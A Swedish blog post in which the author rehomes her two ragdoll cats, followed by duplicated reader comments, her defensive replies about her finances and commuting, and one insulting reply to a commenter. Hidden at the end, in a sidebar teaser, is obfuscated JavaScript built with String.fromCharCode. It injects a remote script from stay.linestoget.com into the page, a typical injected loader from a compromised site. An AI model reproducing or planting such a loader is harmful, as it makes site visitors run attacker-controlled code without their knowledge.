Stina & Sture söker nytt hem

IMG_4718

Hej fina!

IMG_9965 IMG_9998 IMG_0026 IMG_0474

OLYMPUS DIGITAL CAMERA

IMG_2745 IMG_2757 IMG_2762 IMG_3540 IMG_3545 IMG_3931

Usch, ett sånt här vemodigt inlägg med en massa ångest bakom. 

STINA & STURE söker nytt hem 🙏🏻

Mina älskade ragdolls behöver omplaceras ❤️ Nu behöver jag din hjälp!🙏🏻

med blandade känslor, så har jag tagit ett beslut för katternas skull ❤️

Då min livssituation minst sagt förändrats, då jag flyttade ner till Öland varannan vecka för att Lilleman skulle börja skolan där. Sista året har varit kaos, och ingenting av detta fanns med på planerna när Sture & Stina flyttade hem till oss i Sigtuna. Jag har nu pendlat i några veckors tid mellan stockholm / Öland och inser att det inte är rätt mot mina fantatsika kissar💔

Dom förtjänar SÅ mycket bättre ❤️

Jag söker nu en familj som från hjärtat kan ta sig an Stina och Sture.

Ett hem med kärlek, tis och omtanke 🙏🏻

Hjälp mig att DELA detta inlägget på fb, TACK 🙏🏻

vid intresse maila mig på: mymartens@gmail.com 📩👈🏻  

Kram / My Martens

PS: katterna finns med mig i Täby denna veckan.ä för upphämtning… 

71 Komentarer

 1. Oj vad tufft att behöva skiljas från dom fina katterna. Hoppas du hittar ett bra hem till dom. Skulle älskat att ta hand om dom, men bor halva året i Spanien o det är ingen bra ( för varmt) miljö för dom.
  Tufft för Lilleman också, men förstår att du tänker på katternas bästa.

 2. Hej My.
  Vad trist att du måste göra dig av med katterna men jag förstår ju att det blir ett alltför svårt pussel med att bo på två ställen.ja,ja, hoppas på det bästa för dig, Ludvig och katter i framtiden!
  Hälsningar från ett grått och regnigt Värmland.

 3. Förstår dig hade så gärna velat ha dem men du hittar säkert ett bra hem du tänker hela tiden på att dina djur ska ha det så bra kramisar ?❤

 4. Säkert ett jättebra beslut för katterna. Kanske ska du omplacera dem på ett bättre sätt? Många uppfödare hjälper till, det finns sidor för just Ragdoll där man även kan annonsera om omplacering och även flera ragdollforum på Facebook. Tror att det är bra att gå dessa vägar där människor är kunniga om just denna ras som inte är som andra katter.

 5. Oj vad tufft att behöva skiljas från dom fina katterna. Hoppas du hittar ett bra hem till dom. Skulle älskat att ta hand om dom, men bor halva året i Spanien o det är ingen bra ( för varmt) miljö för dom.
  Tufft för Lilleman också, men förstår att du tänker på katternas bästa.

 6. Det var nästan så jag kände det på mig. Du hade EN katt och var tvungen skaffa en till. Det blir nästan svårare att placera om två! Men kanske går det lättare för att ”du är du”.
  När man lever ett sånt liv som du med mycket ombytlighet och mycket hemifrån så är det bättre att från början AVSTÅ djur.
  Du hade ju redan en hund som du skaffat fosterpappa till.
  Jag VET att man gärna vill, att man gärna tror att allt ska fungera. att ens situation inte ska ändras, att man alltid ska bo där man bor mm mm. Och mitt hjärta blöder för dig. Det ska du veta.
  Men jag har avrått så många från att skaffa djur och om bara hälften lyssnat så hade man sluppit såna här tragiska och tråkiga händelser i ens liv.
  Många har gett mig rätt i efterhand.
  Först när man riktigt vet att man landat själv och är där man ska, ja, då kan man skaffa djur, annars kan man avstå.

 7. Hej My.
  Vad trist att du måste göra dig av med katterna men jag förstår ju att det blir ett alltför svårt pussel med att bo på två ställen.ja,ja, hoppas på det bästa för dig, Ludvig och katter i framtiden!
  Hälsningar från ett grått och regnigt Värmland.

 8. My!
  Inget lätt beslut, men ditt hjärta är på rätt ställe och du vill att de ska ha de bra. När du skaffade dem så var din livssituation, helt annan. Förstår att de ett beslut som varit svårt ??. Många kramar Tina

 9. Förstår dig hade så gärna velat ha dem men du hittar säkert ett bra hem du tänker hela tiden på att dina djur ska ha det så bra kramisar 🤗❤

 10. Säkert ett jättebra beslut för katterna. Kanske ska du omplacera dem på ett bättre sätt? Många uppfödare hjälper till, det finns sidor för just Ragdoll där man även kan annonsera om omplacering och även flera ragdollforum på Facebook. Tror att det är bra att gå dessa vägar där människor är kunniga om just denna ras som inte är som andra katter.

 11. Det var nästan så jag kände det på mig. Du hade EN katt och var tvungen skaffa en till. Det blir nästan svårare att placera om två! Men kanske går det lättare för att ”du är du”.
  När man lever ett sånt liv som du med mycket ombytlighet och mycket hemifrån så är det bättre att från början AVSTÅ djur.
  Du hade ju redan en hund som du skaffat fosterpappa till.
  Jag VET att man gärna vill, att man gärna tror att allt ska fungera. att ens situation inte ska ändras, att man alltid ska bo där man bor mm mm. Och mitt hjärta blöder för dig. Det ska du veta.
  Men jag har avrått så många från att skaffa djur och om bara hälften lyssnat så hade man sluppit såna här tragiska och tråkiga händelser i ens liv.
  Många har gett mig rätt i efterhand.
  Först när man riktigt vet att man landat själv och är där man ska, ja, då kan man skaffa djur, annars kan man avstå.

 12. Du har säkert tänkt tusen ggr om du ska göra dig av med dom, tänk en gång till så du inte gör något du ångrar. Vad säger din grabb låt han få uttrycka sig ,varit mycket för honom med flytt, mammas nya kille. Allt i välmening. Tänk riktigt noga nu.

  • Flytten är för Ludvig skull. Jonas och Ludvig har verkligen funnit varandra. Stina & Sture ska inte behöva pendla varannan vecka… jag är schemalagd vatnnan vecka. Dagarn ändrats hit och dit. Kissarna har bott på kattpensionat medans jag är i Sthlm. Det funkar inte i kombination med två städer, flera jobb, och en son. Öland/stockholm. Flighter, tider, deadline osv…. jag har försökt, Vänt ut och in på mig själv… ?? jag får inte ihop det.. just nu, ligger katterna brevid mig i sängen hemma hos Jonas. Vi har bilar i 7.5 h(dålig väglag och köer) imorgon ska vi träffa ett potentialt nytt hem… tror du att det känns lätt? Nej…. inte alls… ?

 13. My!
  Inget lätt beslut, men ditt hjärta är på rätt ställe och du vill att de ska ha de bra. När du skaffade dem så var din livssituation, helt annan. Förstår att de ett beslut som varit svårt 😘😻. Många kramar Tina

 14. Du har säkert tänkt tusen ggr om du ska göra dig av med dom, tänk en gång till så du inte gör något du ångrar. Vad säger din grabb låt han få uttrycka sig ,varit mycket för honom med flytt, mammas nya kille. Allt i välmening. Tänk riktigt noga nu.

  • Flytten är för Ludvig skull. Jonas och Ludvig har verkligen funnit varandra. Stina & Sture ska inte behöva pendla varannan vecka… jag är schemalagd vatnnan vecka. Dagarn ändrats hit och dit. Kissarna har bott på kattpensionat medans jag är i Sthlm. Det funkar inte i kombination med två städer, flera jobb, och en son. Öland/stockholm. Flighter, tider, deadline osv…. jag har försökt, Vänt ut och in på mig själv… 😔😩 jag får inte ihop det.. just nu, ligger katterna brevid mig i sängen hemma hos Jonas. Vi har bilar i 7.5 h(dålig väglag och köer) imorgon ska vi träffa ett potentialt nytt hem… tror du att det känns lätt? Nej…. inte alls… 💔

 15. Mycket märkligt att när Camilla Läckberg o Simon Sköld lägger ut på instagram att dom vill omplasera 4 katter, då får dom kärlek o massa förståelse……. men My hon får kritik, konstigt tycker jag……. MY du gör helt rätt igen, precis som du gjorde med Tess, tänker på djurens bästa. kram från mig.

 16. Såå tråkigt, men det tänkte jag på redan när du skaffade katterna. Med sonens pappa på Öland och du i Sigtuna och hans förestående skolgång.Det går inte att kombinera med föräldrars olika boendeorter och sen katterna.
  Hoppas du hittar ett bra hem till dom, men tänk dig för innan du gör såna inköp igen.
  Lycka till !
  Tror du du orkar pendla tills Lilleman gått ut skolan, tänk på dig själv ibland. Kram

 17. Hej My!
  Tänk vad många förstår-sig-på-are du möter…Beundrar ditt och andra bloggares tålamod när ni behöver möta så många olika versioner av hur du / ni ska leva på bästa sätt.När man läser en del kommentarer tror man att du gjort något kriminellt, allra minst.Herrejösses, du har skaffat djur som du tagit hand om, nu kan du inte ha dem kvar ,och för deras bästa skaffar du nytt hem. Har ni aldrig gjort bedömningar själva i erat liv som hastigt ändrat sig? Livet är inte statiskt, livssituationer kommer och går, betyder det att om man vill skaffa ett djur förbinder man sig till att aldrig flytta, aldrig byta jobb, partner eller livsstil.Både människor och djur är skapta för att överleva, hur har vi annars kunnat finnas till i alla dessa år? Det finns många som är elaka mot djur och vanvårdar dem, och de ska absolut inte ha djur, men kära nån, det finns andra katter eller hundar än Mys som bytit hem och tom överlevt!!Lite perspektiv vore bra.Lycka till My, du väljer säkert ett fint nytt hem åt dina fina katter.Kram ?

 18. Mycket märkligt att när Camilla Läckberg o Simon Sköld lägger ut på instagram att dom vill omplasera 4 katter, då får dom kärlek o massa förståelse……. men My hon får kritik, konstigt tycker jag……. MY du gör helt rätt igen, precis som du gjorde med Tess, tänker på djurens bästa. kram från mig.

 19. Vad tråkigt för er. Men jag hade hellre flyttat helt till Öland och bloggat därifrån och sökt ett arbete där , då kunde du ju behålla katterna. De är ju familjemedlemmar. Du och din nya pojkvän kanske kan köpa hus på Öland i framtiden. Vem orkar att pendla så mycket. Det sliter på kroppen. Mvh Marie

  • Kära Marie…. nu ser inte verkligheten ut så. du och många fler tror att ”det bara för att blogga” ifrån vilken stad som, bara det finns internet. Nu ser dessvärre inte verkligheten ut så… Öland är inte min framtid. Öland är inte mitt hem. Öland kommer aldrig att bli det. OAVSETT jobb, pojkvän osv….. Din omtanke är säkert en ren omtanke. Du menar säkerligen väl. men nu ser inte verkligheten ut så. Ett exempel, nu är klockan 12.41. Jag har haft två fysiska möte, och 1.5h jobb via datorn som har KRÄVT mig på plats här uppe i Stockholm. Jag har utgifter varje månad som motsvarar 2.5 ”svensson” inkomst, (inget nedvärderande) utan dvs en snitt lön på en medelsvensson. Detta pga av konkurs och tidigare kalmar-butik och investeringar. JAG jobbar arselt av mig. det finns inte ett ”vanligt” jobb på Öland/kalmar som kan bära detta. OMÖJLIGT! och kära du….. tro mig då när jag säger att jag har undersökt ALLA möjligheter och lite till innan jag uttalar mig om detta. Jag städar upp ”min skit” efter konkurs. Att jag dessutom 2011 blev lämnad med en nyfödd, med då måååånga anställda två butiker, ( = EXTREMT mycket ansvar) en grossist verksamhet, pendlande till Amsterdam VARJE vecka osv… Det drog med sig en hel del sak som jag just precis just nu, fortfarande ”städar” upp, organiserar upp och gör det bästa utifrån MINA möjligheter. Så att ”bara” flytta ner till öland, leka ”lyckliga familjen” bo tillsammans med min son, med mina katter och ta ett ”vanligt” jobb… det är lixom HELT uteslutet. Jag skulle vara ett socialfall och i personlig konkurs på ca 8-12 veckor. Jag skulle dessutom må fruktansvärt dåligt. psykiskt. Hur skulle jag då vara som mamma? Om jag skulle bli livegen och ett socialfall med skulder för evig framtid? Skulle jag vara en lycklig sprudlande, sund och inspirerande mamma/matte? Nej, knappast. Istället jobbar jag i snitt tre gånger så mycket som en ”vanlig” arbetare. Jag kavlar upp ärmarna, gör om och gör rätt och försöker sakta men säkert ta kontroll över det som livet har dragit med sig. Vissa saker var helt och hållet mitt fel. Vissa beslut borde sett annorlunda ut. men precis om med allting annat så lär man sig under livets gång. Vissa saker har jag inte kunnat påverka, så som otroheten, ludvigs bror som är lika gammal, internstöld i företaget, del av konkursen osv……… En sak kan jag berätta…. jag har backat, reflekterat och”lagat” mig själv. Den enda gången jag backar är när jag tar sats. Det är precis det som jag gör just nu. jag tar sats. För min skull… och för min familjs skull…. Med vänlig hälsning, My

   • Hej! Du gör det du behöver göra med ditt liv och dina katter. Ett bra beslut tex med katterna att de mår bättre att bo i ett hem istället för att åka i mellan två, eller som med din son att han är där du ser att han mår bra. Det jag blev lite ” upprörd” över är ditt ordval att du jobbar i snitt tre gånger mer än en vanlig människa. Jag jobbar 40 h i v och ofta lite övertid iof men då innebär det att du jobbar 120 h i veckan? 17 h per dygn? Kirurger jobbar det ( bl.a. I jouren). Kände mig lite tilltryckt av dig att kalla mig ”vanlig arbetare” i detta fall.

  • Till Marie!
   O här har vi en till som bott hemma på mammas gata hela sitt liv. Marie? Vet du hur Sveriges karta ser ut? Har du varit utanför Kalmar ngn gång överhuvudtaget? Kanske till Nybro på sin höjd? Har du vågat åka ända dit? Ursäkta, men vilken bonnig attityd du har, bosätta sig på Öland? En känd musiker, som ska bosätta sig på lilla bonniga öde Öland o lika lilla öde Kalmar? Där det inte ens finns acceptabla kommunikationer med omvärlden? Vet inte du lilla Marie, att de allra flesta unga människor som är uppväxta i lilla Kalmar flyr denna lilla håla till just Stockholm, för där finns de jobben man vill ha och den framtid man vill ha. Lilla Marie, alla vill kanske inte som du bo på mammas gata hela sitt liv, och sitta i kassan på Ica. Tänk att det finns människor i denna världen som har långt större ambitioner än så. Förstår att du är chockad över det.

 20. Såå tråkigt, men det tänkte jag på redan när du skaffade katterna. Med sonens pappa på Öland och du i Sigtuna och hans förestående skolgång.Det går inte att kombinera med föräldrars olika boendeorter och sen katterna.
  Hoppas du hittar ett bra hem till dom, men tänk dig för innan du gör såna inköp igen.
  Lycka till !
  Tror du du orkar pendla tills Lilleman gått ut skolan, tänk på dig själv ibland. Kram

 21. Hej My!
  Tänk vad många förstår-sig-på-are du möter…Beundrar ditt och andra bloggares tålamod när ni behöver möta så många olika versioner av hur du / ni ska leva på bästa sätt.När man läser en del kommentarer tror man att du gjort något kriminellt, allra minst.Herrejösses, du har skaffat djur som du tagit hand om, nu kan du inte ha dem kvar ,och för deras bästa skaffar du nytt hem. Har ni aldrig gjort bedömningar själva i erat liv som hastigt ändrat sig? Livet är inte statiskt, livssituationer kommer och går, betyder det att om man vill skaffa ett djur förbinder man sig till att aldrig flytta, aldrig byta jobb, partner eller livsstil.Både människor och djur är skapta för att överleva, hur har vi annars kunnat finnas till i alla dessa år? Det finns många som är elaka mot djur och vanvårdar dem, och de ska absolut inte ha djur, men kära nån, det finns andra katter eller hundar än Mys som bytit hem och tom överlevt!!Lite perspektiv vore bra.Lycka till My, du väljer säkert ett fint nytt hem åt dina fina katter.Kram 🙂

 22. Hej! Camilla Läckberg gjorde samma sak förra veckan (p grund av Simons allergi). Hon kanske har kvar uppgifter på några sim var intresserade av de katterna. Detta tips kanske du redan fått. /Mari

 23. Du gör helt rätt My o tyvärr är en del människor orättvisa mot dig på grund av egen ångest. Vet att du undersökt alla möjligheter o skulle aldrig göra något orätt mot varken människor eller djur. Förstår din vånda. Kram

 24. Vad tråkigt för er. Men jag hade hellre flyttat helt till Öland och bloggat därifrån och sökt ett arbete där , då kunde du ju behålla katterna. De är ju familjemedlemmar. Du och din nya pojkvän kanske kan köpa hus på Öland i framtiden. Vem orkar att pendla så mycket. Det sliter på kroppen. Mvh Marie

  • Kära Marie…. nu ser inte verkligheten ut så. du och många fler tror att ”det bara för att blogga” ifrån vilken stad som, bara det finns internet. Nu ser dessvärre inte verkligheten ut så… Öland är inte min framtid. Öland är inte mitt hem. Öland kommer aldrig att bli det. OAVSETT jobb, pojkvän osv….. Din omtanke är säkert en ren omtanke. Du menar säkerligen väl. men nu ser inte verkligheten ut så. Ett exempel, nu är klockan 12.41. Jag har haft två fysiska möte, och 1.5h jobb via datorn som har KRÄVT mig på plats här uppe i Stockholm. Jag har utgifter varje månad som motsvarar 2.5 ”svensson” inkomst, (inget nedvärderande) utan dvs en snitt lön på en medelsvensson. Detta pga av konkurs och tidigare kalmar-butik och investeringar. JAG jobbar arselt av mig. det finns inte ett ”vanligt” jobb på Öland/kalmar som kan bära detta. OMÖJLIGT! och kära du….. tro mig då när jag säger att jag har undersökt ALLA möjligheter och lite till innan jag uttalar mig om detta. Jag städar upp ”min skit” efter konkurs. Att jag dessutom 2011 blev lämnad med en nyfödd, med då måååånga anställda två butiker, ( = EXTREMT mycket ansvar) en grossist verksamhet, pendlande till Amsterdam VARJE vecka osv… Det drog med sig en hel del sak som jag just precis just nu, fortfarande ”städar” upp, organiserar upp och gör det bästa utifrån MINA möjligheter. Så att ”bara” flytta ner till öland, leka ”lyckliga familjen” bo tillsammans med min son, med mina katter och ta ett ”vanligt” jobb… det är lixom HELT uteslutet. Jag skulle vara ett socialfall och i personlig konkurs på ca 8-12 veckor. Jag skulle dessutom må fruktansvärt dåligt. psykiskt. Hur skulle jag då vara som mamma? Om jag skulle bli livegen och ett socialfall med skulder för evig framtid? Skulle jag vara en lycklig sprudlande, sund och inspirerande mamma/matte? Nej, knappast. Istället jobbar jag i snitt tre gånger så mycket som en ”vanlig” arbetare. Jag kavlar upp ärmarna, gör om och gör rätt och försöker sakta men säkert ta kontroll över det som livet har dragit med sig. Vissa saker var helt och hållet mitt fel. Vissa beslut borde sett annorlunda ut. men precis om med allting annat så lär man sig under livets gång. Vissa saker har jag inte kunnat påverka, så som otroheten, ludvigs bror som är lika gammal, internstöld i företaget, del av konkursen osv……… En sak kan jag berätta…. jag har backat, reflekterat och”lagat” mig själv. Den enda gången jag backar är när jag tar sats. Det är precis det som jag gör just nu. jag tar sats. För min skull… och för min familjs skull…. Med vänlig hälsning, My

   • Hej! Du gör det du behöver göra med ditt liv och dina katter. Ett bra beslut tex med katterna att de mår bättre att bo i ett hem istället för att åka i mellan två, eller som med din son att han är där du ser att han mår bra. Det jag blev lite ” upprörd” över är ditt ordval att du jobbar i snitt tre gånger mer än en vanlig människa. Jag jobbar 40 h i v och ofta lite övertid iof men då innebär det att du jobbar 120 h i veckan? 17 h per dygn? Kirurger jobbar det ( bl.a. I jouren). Kände mig lite tilltryckt av dig att kalla mig ”vanlig arbetare” i detta fall.

  • Till Marie!

   O här har vi en till som bott hemma på mammas gata hela sitt liv. Marie? Vet du hur Sveriges karta ser ut? Har du varit utanför Kalmar ngn gång överhuvudtaget? Kanske till Nybro på sin höjd? Har du vågat åka ända dit? Ursäkta, men vilken bonnig attityd du har, bosätta sig på Öland? En känd musiker, som ska bosätta sig på lilla bonniga öde Öland o lika lilla öde Kalmar? Där det inte ens finns acceptabla kommunikationer med omvärlden? Vet inte du lilla Marie, att de allra flesta unga människor som är uppväxta i lilla Kalmar flyr denna lilla håla till just Stockholm, för där finns de jobben man vill ha och den framtid man vill ha. Lilla Marie, alla vill kanske inte som du bo på mammas gata hela sitt liv, och sitta i kassan på Ica. Tänk att det finns människor i denna världen som har långt större ambitioner än så. Förstår att du är chockad över det.

 25. Hej! Camilla Läckberg gjorde samma sak förra veckan (p grund av Simons allergi). Hon kanske har kvar uppgifter på några sim var intresserade av de katterna. Detta tips kanske du redan fått. /Mari

 26. Du gör helt rätt My o tyvärr är en del människor orättvisa mot dig på grund av egen ångest. Vet att du undersökt alla möjligheter o skulle aldrig göra något orätt mot varken människor eller djur. Förstår din vånda. Kram

 27. All heder åt dig My! Jag fattar inte att du ens orkar besvara alla kommentarer från människor som tror sig veta bättre. Jag tycker du verkar vara mycket ansvarstagande, både när det gäller din son, dina djur och ditt liv i övrigt. Hoppas det löser sig bra. Katterna är jättefina, hade gärna kunnat tänka mig att ta hand om dem men vi har tyvärr allergi i familjen. Kram ❤️

 28. All heder åt dig My! Jag fattar inte att du ens orkar besvara alla kommentarer från människor som tror sig veta bättre. Jag tycker du verkar vara mycket ansvarstagande, både när det gäller din son, dina djur och ditt liv i övrigt. Hoppas det löser sig bra. Katterna är jättefina, hade gärna kunnat tänka mig att ta hand om dem men vi har tyvärr allergi i familjen. Kram ❤️

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/